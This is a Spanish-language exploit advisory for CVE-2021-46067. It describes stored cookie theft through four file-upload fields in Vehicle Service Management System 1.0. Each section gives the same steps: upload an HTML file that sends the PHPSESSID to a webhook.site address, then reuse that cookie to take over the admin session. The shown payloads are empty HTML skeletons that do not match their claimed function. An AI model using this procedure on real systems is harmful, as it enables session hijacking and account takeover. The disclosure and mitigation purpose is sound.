CVE-2021-46067
Título del Exploit: Vehicle Service Management System - 'Múltiple' Robo de Cookies Conduce a la Toma Total de la Cuenta
Autor del Exploit: SANU P.L
CVE: CVE-2021-46067
CVSS: 9.8 CRÍTICO
Referencias:
Descripción:
En Vehicle Service Management System 1.0, un atacante puede robar las cookies, lo que conduce a la Toma Total de la Cuenta.
1. Vehicle Service Management System - 'MyAccount' (/admin/?page=user)
Exploit:
- Inicie sesión en el panel de administración http://localhost/vehicle_service/admin
- Navegue a la sección My Account http://localhost/vehicle_service/admin/?page=user
- Genere la URL del Webhook - https://webhook.site
- Copie la URL única del Webhook y péguela en el siguiente código html.
Payload:
<!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>
</body>
</html>
- Guarde el código html anterior, por ejemplo: Cookie Stealing.html
- En la sección My Account, introduzca todos los detalles requeridos y seleccione el archivo html en Avatar.
- Haga clic en el botón update.
- Abra la imagen del avatar en una nueva pestaña y verifique el estado del Webhook.
- Obtuvimos la solicitud, contiene PHPSESSID.
- Copie el valor de PHPSESSID y abra cualquier otro navegador.
- Visite el panel de administración http://localhost/vehicle_service/admin
- Verifique los valores de las cookies y cambie el valor de PHPSESSID al valor de PHPSESSID copiado.
- Ahora acceda al panel de administración http://localhost/vehicle_service/admin
- Inició sesión exitosamente en la cuenta. Toma de cuenta exitosa.
2. Vehicle Service Management System - 'User List' (/admin/?page=user/manage_user)
Exploit:
- Inicie sesión en el panel de administración http://localhost/vehicle_service/admin
- Navegue a la sección User List y haga clic en el botón Create New.
- Genere la URL del Webhook - https://webhook.site
- Copie la URL única del Webhook y péguela en el siguiente código html.
Payload:
<!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>
</body>
</html>
- Guarde el código html anterior, por ejemplo: Cookie Stealing.html
- En la sección Create New User, introduzca todos los detalles requeridos y seleccione el archivo html en Avatar.
- Haga clic en el botón Save.
- Abra la imagen del avatar en una nueva pestaña y verifique el estado del Webhook.
- Obtuvimos la solicitud, contiene PHPSESSID.
- Copie el valor de PHPSESSID y abra cualquier otro navegador.
- Visite el panel de administración http://localhost/vehicle_service/admin
- Verifique los valores de las cookies y cambie el valor de PHPSESSID al valor de PHPSESSID copiado.
- Ahora acceda al panel de administración http://localhost/vehicle_service/admin
- Inició sesión exitosamente en la cuenta. Toma de cuenta exitosa.
3. Vehicle Service Management System - 'Settings-System Logo' (/admin/?page=system_info)
Exploit:
- Inicie sesión en el panel de administración http://localhost/vehicle_service/admin
- Navegue a la sección Settings http://localhost/vehicle_service/admin/?page=system_info
- Genere la URL del Webhook - https://webhook.site
- Copie la URL única del Webhook y péguela en el siguiente código html.
Payload:
<!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>
</body>
</html>
- Guarde el código html anterior, por ejemplo: Cookie Stealing.html
- En la sección Settings, introduzca todos los detalles requeridos y seleccione el archivo html en System Logo.
- Haga clic en el botón update.
- Abra la imagen del System Logo en una nueva pestaña y verifique el estado del Webhook.
- Obtuvimos la solicitud, contiene PHPSESSID.
- Copie el valor de PHPSESSID y abra cualquier otro navegador.
- Visite el panel de administración http://localhost/vehicle_service/admin
- Verifique los valores de las cookies y cambie el valor de PHPSESSID al valor de PHPSESSID copiado.
- Ahora acceda al panel de administración http://localhost/vehicle_service/admin
- Inició sesión exitosamente en la cuenta. Toma de cuenta exitosa.
4. Vehicle Service Management System - 'Settings-Website Cover' (/admin/?page=system_info)
Exploit:
- Inicie sesión en el panel de administración http://localhost/vehicle_service/admin
- Navegue a la sección Settings http://localhost/vehicle_service/admin/?page=system_info
- Genere la URL del Webhook - https://webhook.site
- Copie la URL única del Webhook y péguela en el siguiente código html.
Payload:
<!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>
</body>
</html>
- Guarde el código html anterior, por ejemplo: Cookie Stealing.html
- En la sección Settings, introduzca todos los detalles requeridos y seleccione el archivo html en Website Cover.
- Haga clic en el botón update.
- Abra la imagen del Website Cover en una nueva pestaña y verifique el estado del Webhook.
- Obtuvimos la solicitud, contiene PHPSESSID.
- Copie el valor de PHPSESSID y abra cualquier otro navegador.
- Visite el panel de administración http://localhost/vehicle_service/admin
- Verifique los valores de las cookies y cambie el valor de PHPSESSID al valor de PHPSESSID copiado.
- Ahora acceda al panel de administración http://localhost/vehicle_service/admin
- Inició sesión exitosamente en la cuenta. Toma de cuenta exitosa.
Impacto:
Un atacante sube un archivo html malicioso que redirige a un sitio web de terceros y las cookies quedan expuestas en la solicitud. Esto conduce a la Toma Total de la Cuenta.
Mitigación:
Se recomienda validar la funcionalidad de carga de archivos y realizar verificaciones secundarias en la sesión.